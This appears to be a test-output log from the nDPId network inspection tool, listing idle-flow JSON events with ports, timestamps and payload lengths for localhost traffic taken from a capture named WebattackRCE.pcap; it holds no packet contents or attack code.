+00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":253,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277061,"flow_last_seen":1576420277061,"flow_idle_time":7560000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50050,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":254,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277063,"flow_last_seen":1576420277063,"flow_idle_time":7560000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50052,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":255,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277064,"flow_last_seen":1576420277064,"flow_idle_time":7560000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50054,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":256,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277066,"flow_last_seen":1576420277066,"flow_idle_time":7560000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50056,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":257,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277067,"flow_last_seen":1576420277067,"flow_idle_time":7560000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50058,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":258,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277070,"flow_last_seen":1576420277070,"flow_idle_time":7560000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50060,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":259,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277072,"flow_last_seen":1576420277072,"flow_idle_time":7560000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50062,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":260,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277074,"flow_last_seen":1576420277074,"flow_idle_time":7560000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50064,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":261,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277075,"flow_last_seen":1576420277075,"flow_idle_time":7560000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50066,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":262,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277077,"flow_last_seen":1576420277077,"flow_idle_time":7560000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50068,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":263,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277078,"flow_last_seen":1576420277078,"flow_idle_time":7560000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50070,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":264,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277079,"flow_last_seen":1576420277079,"flow_idle_time":7560000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50072,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":265,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277081,"flow_last_seen":1576420277081,"flow_idle_time":7560000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50074,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":266,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277083,"flow_last_seen":1576420277083,"flow_idle_time":7560000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50076,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":267,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277084,"flow_last_seen":1576420277084,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50078,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":268,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277086,"flow_last_seen":1576420277086,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50080,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":269,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277087,"flow_last_seen":1576420277087,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50082,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":270,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277089,"flow_last_seen":1576420277089,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50084,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":271,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277090,"flow_last_seen":1576420277090,"flow_idle_time":7560000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50086,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":272,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277091,"flow_last_seen":1576420277091,"flow_idle_time":7560000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50088,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":273,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277093,"flow_last_seen":1576420277093,"flow_idle_time":7560000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50090,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":274,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277094,"flow_last_seen":1576420277094,"flow_idle_time":7560000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50092,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":275,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277096,"flow_last_seen":1576420277096,"flow_idle_time":7560000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50094,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":276,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277098,"flow_last_seen":1576420277098,"flow_idle_time":7560000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50096,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":277,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277100,"flow_last_seen":1576420277100,"flow_idle_time":7560000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50098,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":278,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277106,"flow_last_seen":1576420277106,"flow_idle_time":7560000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50100,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":279,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277109,"flow_last_seen":1576420277109,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50102,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":280,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277113,"flow_last_seen":1576420277113,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50104,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":281,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277115,"flow_last_seen":1576420277115,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50106,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":282,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277116,"flow_last_seen":1576420277116,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50108,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":283,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277118,"flow_last_seen":1576420277118,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50110,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":284,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277119,"flow_last_seen":1576420277119,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50112,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":285,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277121,"flow_last_seen":1576420277121,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50114,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":286,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277122,"flow_last_seen":1576420277122,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50116,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":287,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277123,"flow_last_seen":1576420277123,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50118,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":288,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277126,"flow_last_seen":1576420277126,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50120,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":289,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277127,"flow_last_seen":1576420277127,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50122,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":290,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277128,"flow_last_seen":1576420277128,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50124,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":291,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277130,"flow_last_seen":1576420277130,"flow_idle_time":7560000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50126,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":292,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277134,"flow_last_seen":1576420277134,"flow_idle_time":7560000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50128,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":293,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277136,"flow_last_seen":1576420277136,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50130,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":294,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277141,"flow_last_seen":1576420277141,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50132,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":295,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277142,"flow_last_seen":1576420277142,"flow_idle_time":7560000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50134,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":296,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277144,"flow_last_seen":1576420277144,"flow_idle_time":7560000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50136,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":297,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277145,"flow_last_seen":1576420277145,"flow_idle_time":7560000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50138,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":298,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277148,"flow_last_seen":1576420277148,"flow_idle_time":7560000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50140,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":299,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277153,"flow_last_seen":1576420277153,"flow_idle_time":7560000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50142,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 